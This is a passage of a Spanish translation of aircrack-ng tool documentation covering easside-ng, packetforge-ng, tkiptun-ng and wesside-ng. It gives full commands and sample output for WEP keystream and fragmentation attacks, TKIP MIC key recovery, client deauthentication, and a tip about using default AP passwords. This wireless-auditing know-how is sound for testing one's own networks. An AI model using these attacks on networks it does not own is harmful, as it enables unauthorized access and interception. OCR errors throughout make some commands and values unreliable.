4. Después de rastrear un únieo paquete de datos, proeede a descubrir al menos 1504 bytes de 
PROA enviando transmisiones más grandes e interceptando los paquetes retransmitidos. Esta 
técnica se conoce como ataque de fragmentación. El PROA se escribe en el archivo prga.log. 

5. Euego descifra la red IP adivinando los siguientes 4 bytes de PROA utilizando tramas de 
multidifusión y la técnica de expansión de flujo de clave lineal. Al descifrar la solicitud ARP, se 
puede determinar el esquema de número de red. Esto se usa para construir la solicitud ARP que se 
usa para la inyección posterior. Easside-ng también puede usar un paquete IP para determinar la red 
IP, solo lleva un poco más de tiempo. 

6. Crea una conexión TCP permanente con el servidor "amigo" y verifica la conectividad. 

7. ARPs para obtener las direcciones MAC del enrutador y la IP de origen. Eos valores 
predeterminados son .1 para el enrutador y .123 para la IP del cliente. 

8. Euego prueba la conectividad a través del punto de acceso y determina la dirección IP de Internet 
que utiliza el AP. También enumera el tiempo de ida y vuelta de los paquetes de prueba. Esto le da 
una idea de la calidad de la conexión. 

9. Euego se crea la interfaz TAP. 

En este punto, ejecuta "ifconfig atO up" y ahora puede comunicarse con cualquier host en la red wifi 
a través de esta interfaz TAP. ¡Tener en cuenta que no necesita una clave WEP para hacer esto! Ea 
interfaz TAP es una interfaz virtual que actúa como si fuera la interfaz wifi con la clave WEP 
correcta configurada. Puede asignar una IP, usar DHCP con ella, etc. 


13.3. ¿Qué papel juega el servidor amigo? 

Eo siguiente es una descripción simplista. Una descripción muy detallada de los pasos para 
descifrar paquetes se incluye en secciones posteriores. 

• Olfatea el paquete X en el wifi y está encriptado. 

• Si, por ejemplo, este paquete iba a cnn.com, entonces en Internet llegaría en texto claro. 
Internet no usa WEP. 

• Ea idea es retransmitir ese paquete, pero en lugar de enviarlo a su destino original (cnn.com) 
lo enviamos a nuestro amigo en Internet. 

• El amigo lo recibe en texto claro. El AP descifrará el paquete antes de enviarlo a Internet y 
nos lo devuelve. 

13.4. Comunicación con la red WIFI 


Entonces quizás te preguntes "¿Cuál es la magia? ¿Cómo puede acceder a la red WIEI sin conocer 
la clave WEP? ”. El método es bastante simple pero ingenioso. 

Veamos los detalles de envío y recepción de paquetes a través de la interfaz atO TAP. 

Envío de paquetes: 

• Se entrega un paquete a atO (interfaz TAP) basado en la tabla de enrutamiento de la red 
local. Según la dirección IP de destino con la que intente comunicarse, es posible que deba 
agregar manualmente las entradas de enrutamiento estático. Por defecto, la red wifi se 
agrega a la tabla de enrutamiento por usted. 

• Ea interfaz TAP entrega el paquete a easside-ng 

• Euego easside-ng lo encripta para inyección usando el PRCA reunido en la fase de 
conectividad inicial. 

• Luego easside-ng inyecta el paquete en la red wifi a través del dispositivo inalámbrico. 
Recibiendo paquetes: 



• Un dispositivo fuente (cableado o inalámbrico) envia un paquete destinado a la IP asignada 
a la interfaz athO o a un destino de transmisión. El AP transmite el paquete al aire. 

• Easside-ng escucha constantemente los paquetes que transmite el AP. Euego procesa los 
paquetes dirigidos a la IP TAP en función de la dirección MAC o las transmisiones. 

• Para cada paquete que necesita procesar, primero se debe descifrar el paquete. Esto se hará 
en múltiples pasos. Eos pasos siguen. 

• Easside-ng crea un nuevo paquete compuesto por 2 fragmentos. El primer fragmento no 
tiene datos, simplemente tiene la IP de destino del servidor amigo. Este fragmento se 
encripta utilizando el PROA (flujo de claves). El segundo fragmento contiene el paquete a 
descifrar. Como este paquete ya está encriptado, se usa "tal cual". Este nuevo paquete que 
consta de 2 fragmentos se inyecta en la red wifl. 

• El AP recibe el paquete fragmentado, descifra cada fragmento y vuelve a ensamblar los 
fragmentos en un solo paquete. Dado que la IP de destino del paquete reensamblado es el 
servidor amigo, lo reenvía al servidor amigo. Debe tener en cuenta que el AP tuvo la 
amabilidad de descifrar el paquete por usted 

• El servidor amigo recibe el paquete descifrado del AP por UDP Euego reenvía la 
información descifrada a easside-ng. 

• Euego easside-ng envia el paquete descifrado a la interfaz atO (TAP). 

13.5. Técnica de fragmentación 

Esta sección proporciona una breve explicación de la técnica de fragmentación utilizada en easside- 

ng. 

Esta técnica, cuando tiene éxito, puede obtener 1504 bytes de PRCA (algoritmo de generación 
pseudoaleatoria). Este ataque no recupera la clave WEP en si, sino que simplemente obtiene el 
PROA. El PROA se puede utilizar para cifrar los paquetes que desea transmitir. Requiere que se 
reciba al menos un paquete de datos desde el punto de acceso para iniciar el ataque. 

Básicamente el programa obtiene una pequeña cantidad de material de claves del paquete y luego 
intenta enviar paquetes con contenido conocido al punto de acceso (AP). Si el AP repite con éxito el 
paquete, se puede obtener una mayor cantidad de información clave del paquete devuelto. Este ciclo 
se repite varias veces hasta obtener 1504 bytes de PROA. 

13.6. Técnica de expansión de flujo de ciave iineai 

Ea base de esta técnica es el hecho de que los paquetes como una solicitud ARP encriptada pueden 
identiflcarse fácilmente combinados con el hecho de que el inicio de la misma tiene texto sin 
formato. 

Primero el programa obtiene el PROA de la porción de texto plano conocida de la solicitud ARP. 
Euego crea un nuevo paquete de solicitud ARP dividido en 2 fragmentos. El primer fragmento es un 
octeto más que el PROA conocido y el PROA adivina el octeto adicional. Estas suposiciones se 
envian y el programa escucha para ver cual es reproducido por el AP. El paquete reproducido tiene 
la PROA correcta y este valor se incluyó en la dirección de multidifusión de destino. Ahora que 
conocemos el PROA correcto, se puede descifrar un octeto más en la solicitud ARP original. Este 
proceso se repite hasta que se desencripta la IP de envió en la solicitud ARP original. Se necesitan 
un máximo de 256 conjeturas para determinar la PROA correcta para un octeto en particular y en 
promedio solo 128 conjeturas. 

Ea técnica de expansión de flujo de clave lineal (inductivo de Arbaugh) es el chopchop inverso. 
Chopchop descifra los paquetes de atrás hacia adelante. Eineal descifra paquetes de adelante hacia 
atrás. En realidad, chopchop es Arbaugh inverso. 



13.7. 


Easside-ng comparado a wesside-ng 


Caraeterística 

easside-ng 

wesside-ng 

Estabilidad del programa 

Estable 

Prueba de 
concepto 

Encuentra una direeción MAC para falsificar 

No 

Si 

Autenticación falsa a AP 

Si 

Si 

Puede usar paquetes ARP para la fragmentaeión 

Si 

Si 

Puede usar paquetes IP para la fragmentación 

Si 

No 

Ataque de fragmentación para obtener PRGA 

Si 

Si 

Técnica de expansión de flujo de clave lineal 

Si 

Si 

Comunieaeión con la red wifi sin elave WEP 

Si 

No 

Inundaeión de solicitudes ARP de red 

No 

Si 

Ataque PTW de aircraek-ng 

No 

Si 

Reeuperaeión clave WEP 

No 

Si 


13.8. ¿Por qué easside-ng cuando aircrack-ng tiene PTW? 

¿Por qué lanzar easside-ng euando aireraek-ng tiene PTW? 

• easside-ng era privado y llegó un año antes que PTW. 

• easside-ng es útil para un ataque rápido y sigiloso. Es signifieativamente más rápido que 
PTW. Es "instantáneo" y no requiere inundaeiones. 

13.9. Escenarios 

13.9.1. Ejempio de uso de AP específico 

Asegúrese de usar airmon-ng para poner la tarjeta en modo monitor. 

Primero se debe iniciar un servidor de amigos. Esto debe ubicarse en Internet y ser accesible desde 
el sistema que ejecuta easside-ng a través de TCP. También debe ser accesible desde el AP a través 
de UDP. El puerto 6969 no puede ser cortafuegos en él. 

Arrancar el servidor amigo: 
buddy-ng 
Responde: 
buddy-ng 

Waiting for connexion 

Cuando se conecta easside-ng, responde de forma similar: 

Got connection from 10.113.65.187 

Handshake complete 

Inet checkby 10.113.65.187 1 

Ea IP 10.113.65.187 anterior es la IP del sistema donde eorre easside-ng. 

Ahora ejecutar easside-ng: 

easside-ng -f athO -v 00:14:6C:7E:40:80 -c 9 -s 10.116.23.144 
donde: 

• -f athO es el nombre de la interfaz inalámbriea. 

• -V 00:14:6C:7E:40:80 es la dirección MAC del AP. 

• -c 9 el canal con el que funciona el AP. 

• -s 10.116.23.144 La IP del servidor amigo. 

El sistema responde: 





Setting tap MTU 
Sorting out wifi MAC 
MAC is 00:08:D4:86;7E:98 
Setting tap MAC 
[14:40:06.596419] Ownin... 

SSID teddy Chan 9 Mac 00:14:6C:7E:40:80 

Sending auth request 

Authenticated 

Sending assoc request 

Associated: 1 

Assuming ARP 54 

[14:40:13.537842] Got 22 bytes of PROA IV [4B:02:00] 

[14:40:13.545021] Got 58 bytes ofPRGAIV [4C:02:00] 

[14:40:13.648670] Got 166 bytes ofPRGAIV [40:02:00] 

[14:40:13.753087] Got 490 bytes ofPRGAIV [4E:02:00] 

[14:40:13.863819] Got 1462 bytes ofPRGAIV [4P:02:00] 

[14:40:13.966753] Got 1504 bytes ofPRGAIV [50:02:00] 

Assuming ARP 36 

[15:23:42.047332] Guessing prga byte 22 with 16 
ARP IP so far: 192 

[15:23:42.749330] Guessing prga byte 23 with 3P 
ARPIPso far: 192.168 

[15:23:43.815329] Guessing prga byte 24 with 60 
ARPIPso far: 192.168.1 
MylP 192.168.1.123 
RtrlP 192.168.1.1 

Sending who has 192.168.1.1 tell 192.168.1.123 

Rtr MAC 00:14:6C:7E:40:80 

Trying to connect to buddy: 10.116.23.144:6969 

Connected 

Handshake compl33t 

Checking for internet... 1 

Internet wOrx. Public IP 10.113.65.187 

Rtt 77ms 

En este punto, se debe abrir la interfaz TAP: 
ifconfig ato up 

Ahora puede enviar y recibir paquetes hacia y desde la red AP, que en este caso es 192.168.1.0/24 a 
través de la interfaz atO. Tenga en cuenta que no necesita una clave WEP para hacer esto. Ea 
interfaz TAP es una interfaz virtual que actúa como si fuera la interfaz wifi con la clave WEP 
correcta configurada. Puede asignar una IP, usar DHCP con ella, etc. Por defecto, a la interfaz atO se 
le asigna la red obtenida al inicio más ".123". 

13.9.2. Ejemplo de uso de escaneo de APs 

El ejemplo de uso de AP especifico es para apuntar a un único punto de acceso en un canal 
especifico. También puede permitir que easside-ng busque AP utilizando "easside-ng -f athO -s 
10.116.23.144". 

13.10. Trucos 

13.10.1. Combinando easside-ng y wesside-ng 

wesside-ng es una herramienta de prueba de concepto que es rica en funcionalidad, pero no es tan 
estable y libre de errores en comparación con easside-ng. Puede combinar las fortalezas de wesside- 
ng y easside-ng juntas. 



Primero ejecute easside-ng para obtener el archivo prga. Luego ejecute wesside-ng para inundar la 
red y obtener la clave WEP. Es realmente asi de simple. 

13.10.2. Demostrando inseguridad 

Una forma inteligente de demostrar la inseguridad de las redes WEP y los puntos de acceso; 

• Use easside-ng para crear un mecanismo de acceso a la red WIFI. 

• Inicie sesión en AP con su navegador favorito. El 99% de las veces, los AP tienen 
identificadores y contraseñas predeterminados. Muchas veces no hay contraseñas 
establecidas. Una vez que haya iniciado sesión en el AP, puede ir a la página de 
configuración WEP y leer la clave WEP desde la página de configuración. En algunos casos, 
donde hay asteriscos (*) para la clave, es posible que deba mirar la fuente HTML o usar una 
herramienta para revelar la contraseña. 

• Ahora puede configurar su tarjeta inalámbrica con la clave WEP y acceder a la red 
normalmente. 

13.10.3. Configuración de la prueba 

Esta sección discutirá qué funciona y qué no funciona con respecto a probar easside-ng contra su 
propia LAN inalámbrica. 6969 es el puerto estándar utilizado por easside-ng y buddy-ng. Si lo 
cambia, entonces, por supuesto, use el número de puerto revisado en todas las referencias a 
continuación. 

Primero, algunas suposiciones simples sobre su LAN inalámbrica: 

• Tiene acceso a internet. 

• El puerto UDP de salida 6969 a Internet no está bloqueado. Algunos cortafuegos solo 
permiten la comunicación en puertos que han sido explicitamente permitidos. 

• Ha probado su capacidad para conectarse al servidor buddy-ng. Vea cómo realizar esta 
prueba a continuación. 

Suposiciones sobre su servidor buddy-ng: 

• Se ejecuta en Internet con una dirección IP enrutable 

• Es accesible tanto por el sistema que ejecuta easside-ng como por la EAN inalámbrica 

• El puerto UDP y TCP 6969 entrante y saliente está permitido. 

Suposiciones sobre el sistema que ejecuta easside-ng; 

• Se ejecuta en Internet con una dirección IP enrutable. 

• El puerto TCP saliente 6969 a Internet no está bloqueado. Algunos cortafuegos solo 
permiten la comunicación en puertos que han sido explicitamente permitidos. 

• Ha probado su capacidad para conectarse al servidor buddy-ng. Vea cómo realizar esta 
prueba a continuación. 

• Contiene un dispositivo inalámbrico compatible con aircrack-ng y está en modo monitor. 

La forma más fácil de probar la conectividad con el servidor buddy-ng es mediante telnet. 
Asegúrese de iniciar su proceso de servidor de amigos antes de hacer esta prueba. De lo contrario, 
fallará con seguridad. 

Entrar; 

telnet <ip of buddy server> 6969 
El sistema debería responder: 

Trying <ip of buddy server>... 

Connected to <ip of buddy server>. 

Escape character is 

El servidor amigo se pareceria a algo como esto: 

Waiting for connexion 

Got connection firom <ip of the easside-ng system> 

Cuando se termina la sesión telnet, se vería algo asi: 

That was it 

Waiting for connexion 



Los ejemplos anteriores muestran una prueba exitosa. Si su prueba falla, utiliee tcpdump o 
wireshark en ios sistemas de origen y destino para deteetar el puerto 6969. Determine el problema 
eon estas herramientas y otras, luego eorrija el problema raíz. 

Si está ejecutando easside-ng y buddy-ng en el mismo sistema, entonces el sistema debe tener una 
dirección IP de Internet enrutable. No puede estar en una LAN detrás de un cortafuegos que realiza 
la traducción de direcciones de red (NAL). 

La situación ideal es tener el servidor buddy-ng ejecutándose en un sistema separado en algún lugar 
de Internet. Luego tenga un segundo sistema con easside-ng ejecutándose con una dirección IP 
enrutable. 



14. Packetforge-ng 


14.1. Descripción 

El fin de packetforge-ng es crear paquetes encriptados que posteriormente puedan usarse para 
inyección. Puede crear varios tipos de paquetes como ARP request, UDP, ICMP y paquetes 
personalizados. El uso más común es crear ARP request para la inyección posterior. 


Uso: packetforge-ng <modo> <opciones> 


Opciones de 


falsificación: 


-p <fctrl> 

establecer la palabra de control del paquete (hex) 

-a <bssid> 

establecer la dirección MAC del punto de acceso 

-c <dmac> 

establecer la dirección MAC de destino 

-h <smac> 

establecer la dirección MAC de origen 

-j 

establecer el bit EromDS 

-0 

borrar el bit ToDS 

-e 

desactivar el cifrado WEP 

-k <ip[:port]> 

establecer la IP de destino [Puerto] 

-1 <ip[:port]> 

Establecer la IP de origen [Puerto] 

-tttl 

establecer el tiempo de vida 

-w <file> 

escribir los paquetes a este archivo pcap 

-s <size> 

especificar el tamaño del paquete nulo 

-n <packets> 

establecer el número de paquetes a generar 


Opciones del origen: 


-r <file> 

leer el paquete de este archivo en bruto 

-y <file> 

leer PRCA de este archivo 


Modos: 


—arp 

Ealsificar un paquete ARP (-0) 

—udp 

Ealsificar un paquete UDP (-1) 

—icmp 

Ealsificar un paquete ICMP (-2) 

-nuil 

Construir un paquete nulo (-3) 

—custom 

Construir un paquete a medida (-9) 


—help : Muestra esta pantalla de uso. 


14.2. Ejempio 

14.2.1. Generando un paquete de soiicitud ARP 

Primero obtener un archivo xor (PROA) con el método de fragmentación o aireplay-ng chopchop. 
Euego usar el siguiente comando: 






packetforge-ng -0 -a 00:14:6C:7E:40;80 -h 00:0F:B5;AB:CB:9D -k 192.168.1.100 -1 192.168.1.1 -y 

fragment-0124-161129.xor -w arp-request 

donde: 

-0 indica que desea que se genere un paquete de solicitud ARP 

-a 00: 14: 6C: 7E: 40: 80 es la dirección MAC del punto de acceso 

-ti 00: OE: B5: AB: CB: 9D es la dirección MAC de origen que desea utilizar 

-k 192.168.1.100 es la IP de destino. lE En un ARP es el "Quién tiene esta IP" 

-1 192.168.1.1 es la IP de origen. lE En un ARP es el "Tell this IP" 

-y fragment-0124-161129.xor 
-w paquete-arp 

Suponiendo que esté experimentando con su propio punto de acceso, el paquete de solicitud ARP 
generado anteriormente se puede descifrar con su propia clave. Entonces para ver ese paquete que 
acabamos de crear, se puede descifrar: 

Ejecutar "airdecap-ng -w <clave de cifrado del punto de acceso> solicitud de arp" 


Eos resultados se ven asi: 

Total number of packets read 1 

Total number ofWEP data packets 1 
Total number ofWPA data packets 0 
Number of plaintext data packets 0 
Number of decrypted WEP packets 1 
Number of decrypted WPA packets 0 


Para ver el paquete que se acaba de descifrar, ejecutar "tcpdump -n -vvv -e -sO -r arp-request-dec" 
Eos resultados se ven asi: 

reading from file arp-request-dec, link-type EN 10MB (Ethernet) 

18:09:27.743303 00:0f:b5:ab:cb:9d > Broadcast, ethertype ARP (0x0806), length 42: arp who-has 
192.168.1.100 tell 192.168.1.1 

Que es exactamente lo que esperábamos. Ahora se puede inyectar este paquete de solicitud ARP de 
la siguiente manera "aireplay-ng -2 -r arp-request athO". 

El programa responderá de la siguiente manera: 

Size: 68, EromDS: 0, ToDS: 1 (WEP) 

BSSID = 00:14:6C:7E:40:80 
Dest. MAC = FF:FF:FF:FF:FF:FF 
Source MAC = 00:0F:B5:AB:CB:9D 

0x0000: 0841 0201 0014 6c7e4080 OOOfbóab cb9d .A....l~@. 

0x0010: fftf ffffftff 8001 6c48 0000 0999 881a .IH. 

0x0020: 49fc 21flf 781a dc42 2©6 8fcc 9430 144d I.!.x..B/....0.M 

0x0030: 3ab2 cflf5 d4dl 6743 8056 24ec 9192 clel :.gC.V$. 

0x0040: d64fb709 .O.. 

Use this packet ? y 

Saving chosen packet in replay_src-0124-163529.cap 
You should also start airodump-ng to capture repites. 

End of file. 

Al teclear “y” arriba, se inyecta el paquete que se creó con packetforge-ng. 

14.2.2. Generando un paquete nuil 

Esta opción permite generar paquetes nulos LLC. Estos son los paquetes más pequeños posibles y 
no contienen datos. El flag "-s" se utiliza para configurar manualmente el tamaño del paquete. Esta 
es una manera simple de generar pequeños paquetes para inyección. 

Recordar que el valor de tamaño (-s) define el tamaño absoluto de un paquete sin cifrar, por lo que 
debe agregar 8 octetos para obtener su longitud final después de cifrarlo (4 octetos para iv + idx y 4 









octetos para icv). Este valor también incluye el encabezado 802.11 con una longitud de 24 octetos. 


El comando es: 

packetforge-ng —nuil -s 42 -a BSSID -h SMAC -w short-packet.cap -y fragment.xor 
donde: 

- -nuil signifiea generar un paquete nulo LLC 

-s 42 especifiea la longitud del paquete que se generará. 

-a BSSID es la dirección MAC del punto de acceso. 

-h SMAC es la dirección MAC de origen del paquete que se generará. 

-w short-packet.cap es el nombre del archivo de salida. 

-y fragment.xor es el nombre del archivo que contiene el PRCA. 

14.2.3. Generando un paquete de cliente 

Si se desea generar un paquete de cliente, primero crear un paquete con la herramienta que elija. 
Esta podría ser una herramienta especializada, un editor hexadecimal o incluso de una eaptura 
anterior. Luego guárdelo eomo un arehivo peap. Después de esto, ejecutar el comando: 
packetforge-ng -9 -r input.eap -y keystream.xor -w output.eap 
donde: 

-9 signifiea generar un paquete personalizado. 

-r input.eap es el archivo de entrada. 

-y keystream.xor es el archivo que contiene el PRCA. 

-w output.eap es el archivo de salida. 

Cuando se ejecuta, packetforge-ng le preguntará que paquete usar y luego generará el archivo. 

14.3. Truco 

A la mayoría de los puntos de aeeeso realmente no les importa que IP se utilizan para la solicitud 
ARP. Como resultado, puede usar 255.255.255.255 para las IP de origen y de destino. 

Entonces el eomando packetforge-ng se eonvierte en: 

packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 255.255.255.255 -1 
255.255.255.255 -y fragment-0124-161129.xor -w arp-request 



15. Tkiptun-ng 


15.1. Descripción 

Tkiptun-ng es la implementación de prueba de eoneepto del ataque WPA/TKIP. Esta herramienta 
está diseñada para inyeetar eódigo eneriptado en una red WPA-TKIP eon QoS. 

Básieamente Tkiptun-ng empieza obteniendo texto plano en un pequeño paquete y del MIC 
(Message Integrity Cheek). Esto es posible mediante el ataque por el método chopehop.Una vez que 
esto está heeho, El algoritmo de Miehael, invierte la elave MIC usada para proteger los paquetes 
enviados desde el Punto de aeeeso (AP) al Cliente o estaeión, el eual la puede ealeular. En este 
momento, tkiptun - ng ha recuperado la clave MIC y conoce un keystram para acceder a la 
comunicación con el punto cliente. Posteriormente, usando el archivo de XOR, podemos crear 
nuevos paquetes e inyectarlos. Ea creación y la inyección son satisfactorias usando el aircrack-ng de 
la suite de herramientas. 

Tanto el AP como el cliente deben admitir QoS o, a veces, llamados Wi-Ei Multi-media (WMM) en 
algunos AP. El AP debe estar configurado para WPA más TKIP. Se debe usar un tiempo bastante 
largo, como 3600 segundos. Debería ser al menos 20 minutos. 

Ea dirección MAC de la tarjeta de red utilizada por tkiptun-ng debe establecerse en la dirección 
MAC del cliente que está atacando. 

15.2. Uso 

uso: tkiptun-ng <options> <replay interface> 

Opciones de fdtro: 


-d dmac 

Dirección MAC, destino 

-s smac 

Dirección MAC, origen 

-m len 

Longitud mínima del paquete. Por defecto: 80 

-n len 

Longitud máxima del paquete. Por defecto: 80 

-t tods 

control de paquete, un bit DS 

-f fromds 

control de paquete, de bit DS 

-D 

deshabilitar la detección de AP 

-Z 

seleccionar paquetes manualmente 


Opciones de reproducción: 


-X nbpps 

número de paquetes por segundo 

-a bssid 

establecer la dirección MAC del punto de acceso 

-c dmac 

establecer la dirección MAC de destino 

-h smac 

establecer la dirección MAC de origen 

-e essid 

establecer el SSID de la AP objetivo 

-M sec 

tiempo de espera de error de MICen segundos. Por defecto 60 


Opciones de depuración: 


-K prga 


Keystream para la continuación 






-y fde 

keystream-file para continuar 

-j 

inyeetar paquetes FromDS 

-P pmk 

pmk para pmeba de verificación/vulnerabilidad 

-p psk 

psk para calcular pmk con essid 


Opciones del origen: 


-i iface 

capturar paquetes desde esta interfaz 

-r file 

extraer paquetes de este archivo pcap 


—help : Muestra esta pantalla de uso. 

15.3. Ejemplos 

Ejecutar 

tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 rausbO 
Salida: 

The interfaee MAC (00:0E:2E:C5:81:D3) doesn't mateh the speeified MAC (-h). 

ifconfig rausbO hw ether 00:0E:B5:AB:CB:9D 
Blub 2:38 E6 38 IC 24 15 IC CE 
Blub 1:17 DD OD 69 ID C3 lE EE 
Blub 3:29 31 79 E7 E6 CE 8D 5E 
15:06:48 Miehael Test: Suceessful 

15:06:48 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9 
15:06:48 Found speeified AP 

15:06:48 Sending 4 direeted DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs] 

15:06:54 Sending 4 direeted DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs] 

15:06:56 WPAhandshake: 00:14:6C:7E:40:80 captured 
15:06:56 Waiting for an ARP packet coming from the Client... 

Saving chosen paeket in replay_sre-0305-150705.cap 

15:07:05 Waiting for an ARP responso packet coming from the AP... 

Saving ehosen paeket in replay_src-0305-150705.cap 
15:07:05 Got the answer! 

15:07:05 Waiting 10 seconds to let enerypted EAPOE firames pass without interfering. 

15:07:25 Offset 99 ( 0% done) | xor = B3 | pt = D3 | 103 frames written in 84468ms 

15:08:32 Offset 98 ( 1% done) | xor = AE | pt = 80 | 64 frames written in 52489ms 

15:09:45 Offset 97 ( 3% done) | xor = DE | pt = C8 | 131 frames written in 107407ms 
15:11:05 Offset 96 ( 5% done) | xor = 5A | pt = 7A | 191 frames written in 156619ms 
15:12:07 Offset 95 ( 6% done) | xor = 27 | pt = 02 | 21 frames written in 17221 ms 

15:13:11 Offset 94 ( 8% done) | xor = D8 | pt = AB | 41 frames written in 33625ms 

15:14:12 Offset 93 (10% done) | xor = 94 | pt = 62 | 13 frames written in 10666ms 
15:15:24 Offset 92 (11% done) | xor = DE | pt = 68 | 112 frames written in 91829ms 
Eooks like mic failure report was not detected. Waiting 60 seeonds before trying again to avoid the 
AP shutting down. 

15:18:13 Offset 91 (13% done) | xor = Al | pt = El | 477 frames written in 391139ms 
15:19:32 Offset 90 (15% done) | xor = 5E | pt = B2 | 186 frames written in 152520ms 
Eooks like mié failure report was not detected. Waiting 60 seeonds before trying again to avoid the 
AP shutting down. 

15:22:09 Offset 89 (16% done) | xor = 9C | pt = 77 | 360 frames written in 295200ms 





Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the 
AP shutting down. 

Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the 
AP shutting down. 

15:26:10 Offset 88 (18% done) | xor = OD | pt = 3E | 598 frames written in 490361ms 

15:27:33 Offset 87 (20% done) | xor = 8C | pt = 00 | 230 frames written in 188603ms 

15:28:38 Offset 86 (21% done) ¡ xor = 67 | pt = 00 | 47 frames written in 38537ms 
15:29:53 Offset 85 (23% done) | xor = AD | pt = 00 | 146 frames written in 119720ms 

15:31:16 Offset 84 (25% done) | xor = A3 | pt = 00 | 220 frames written in 180401ms 

15:32:23 Offset 83 (26% done) | xor = 28 | pt = 00 | 75 frames written in 61499ms 

15:33:38 Offset 82 (28% done) | xor = 7C | pt = 00 | 141 frames written in 115619ms 

15:34:40 Offset 81 (30% done) | xor = 02 | pt = 00 | 19 frames written in 15584ms 

15:35:57 Offset 80 (31% done) | xor = C9 | pt = 00 | 171 frames written in 140221ms 

15:37:13 Offset 79 (33% done) | xor = 38 | pt = 00 | 148 frames written in 121364ms 

15:38:21 Offset 78 (35% done) | xor = 71 | pt = 00 | 84 frames written in 68872ms 
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the 
AP shutting down. 

15:40:55 Offset 77 (36% done) | xor = 8E | pt = 00 | 328 frames written in 268974ms 
Eooks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the 
AP shutting down. 

15:43:31 Offset 76 (38% done) | xor = 38 | pt = 00 | 355 frames written in 291086ms 

15:44:37 Offset 75 (40% done) | xor = 79 | pt = 00 | 61 frames written in 50021ms 

Eooks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the 
AP shutting down. 

15:47:05 Offset 74 (41% done) | xor = 59 | pt = 00 | 269 frames written in 220581ms 

15:48:30 Offset 73 (43% done) | xor = 14 | pt = 00 | 249 frames written in 204178ms 

15:49:49 Offset 72 (45% done) | xor = 9A | pt = 00 | 183 frames written in 150059ms 

Eooks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the 
AP shutting down. 

15:52:32 Offset 71 (46% done) | xor = 03 | pt = 00 | 420 frames written in 344400ms 

15:53:57 Offset 70 (48% done) | xor = OE | pt = 00 | 239 frames written in 195980ms 

Sleeping for 60 seconds.36 bytes still unknown 
ARP Reply 
Checking 192.168.x.y 

15:54:11 ReversedMIC Key (EromDS): C3:95:10:04:8P:8D:6C:66 

Saving plaintext in replay_dec-0305-15541Lcap 
Saving keystream in replay_dec-0305-15541Lxor 
15:54:11 

Completed in 2816s (0.02 bytes/s) 

15:54:11 AP MAC: 00:40:P4:77:P0:9B IP: 192.168.21.42 
15:54:11 Client MAC: 00:0P:B5:AB:CB:9D IP: 192.168.21.112 
15:54:11 Sent encrypted tkip ARP request to the client. 

15:54:11 Walt for the mic countermeasure timeout of 60 seconds. 



16. Wesside-ng 


16.1. Descripción 

Wesside-ng es una herramienta de magia automátiea que incorpora una serie de técnicas para 
obtener sin problemas una clave WEP en minutos. Primero identifica una red, luego procede a 
asociarse con ella, obtiene datos xor PRGA (algoritmo de generación pseudoaleatoria), determina el 
esquema IP de la red, reinyecta solicitudes ARP y finalmente determina la clave WEP Todo esto se 
hace sin intervención. 

Wesside-ng se ha actualizado para reflejar los avances en la determinación de la clave WEP. Estos 
son los pasos que toma wesside-ng: 

1. El canal salta buscando una red WEP. 

2. Lina vez que se encuentra una red, intenta autenticarse. Si la autenticación falla, entonces el 
programa intenta encontrar una dirección MAC actualmente asociada con el AP para falsificar. 

3. Una vez que el programa se ha autenticado con éxito, se asocia con el AP. 

4. Después de rastrear un único paquete de datos, procede a descubrir al menos 128 octetos de 
PRGA enviando transmisiones más grandes e interceptando los paquetes retransmitidos. Esto es lo 
que se conoce como ataque de fragmentación. El PRGA se escribe en el archivo prga.log. 

5. Después de detectar una solicitud ARP, descifra la dirección IP al adivinar los siguientes 4 octetos 
de PRGA utilizando paquetes multicast y la técnica de expansión de flujo de clave lineal. Al 
descifrar la solicitud ARP, se puede determinar el esquema del número de red más la IP de origen de 
la solicitud ARP. Esto se usa para construir la solicitud ARP que se usa para la inyección posterior. 

6. Inunda la red con solicitudes ARP para la dirección IP descifrada. 

7. Inicia el ataque PTW aircrack-ng para determinar la clave WEP. 

8. Entonces, puede preguntarse "¿Cuál es la técnica de expansión de flujo de clave lineal?". Ea base 
es el hecho de que los paquetes como una solicitud ARP encriptada pueden identificarse fácilmente 
combinados con el hecho de que el inicio de la misma tiene texto sin formato. Entonces el programa 
primero obtiene el PRGA de la porción de texto plano conocida de la solicitud ARP. Euego crea un 
nuevo paquete de solicitud ARP dividido en 2 fragmentos. El primer fragmento es un octeto más 
que el PRGA conocido y el PRGA adivina el octeto adicional. Estas suposiciones se envian y el 
programa escucha para ver cual es reproducido por el AP. El paquete reproducido tiene la PRGA 
correcta y este valor se incluyó en la dirección de multidifúsión de destino. Ahora que conocemos el 
PRGA correcto, se puede descifrar un octeto más en la solicitud ARP original. Este proceso se 
repite hasta que se desencripta la IP de envió en la solicitud ARP original. Se necesitan un máximo 
de 256 conjeturas para determinar la PRGA correcta para un octeto particular y en promedio solo 
128 conjeturas. 

Existen algunas limitaciones conocidas: 

• Solo se admite la autenticación abierta. Ea autenticación de clave compartida no es 
compatible. 

• Solo se admiten redes B y G. 

• Ea falsa funcionalidad MAC se rompe si hay mucho tráfico en la red. 

Recordar que esto sigue siendo básicamente una herramienta de prueba de concepto, por lo que 
puede esperar encontrar errores. Considere usar easside-ng como una alternativa o un programa 
complementario. Easside-ng se considera un software relativamente estable. 


16.2. 


Uso 



Uso: wesside-ng <opciones> -i <interface> 
Opciones: 


-h 

Esta pantalla de ayuda 

-i <interface> 

Interfaz a utilizar (obligatorio) 

-m <my ip> 

Mi direceion IP. El valor predeterminado es network.123 
en la solicitud ARP capturada (Opcional) 

-n <net ip> 

Dirección IP de la red. El valor predeterminado es la IP de 
origen en la solicitud ARP que se captura y descifra. 
(Opcional) 

-a <mymae> 

Dirección MAC de origen 

-e 

No romper la llave. Simplemente captura los paquetes 
hasta que se presione el control-C para detener el programa 
(Opcional) 

-p <min prga> 

Mínimo de bytes de PRGApara reunir. Por defecto 128 

-V <vietim mae> 

BSSID de la victima (Opcional) 

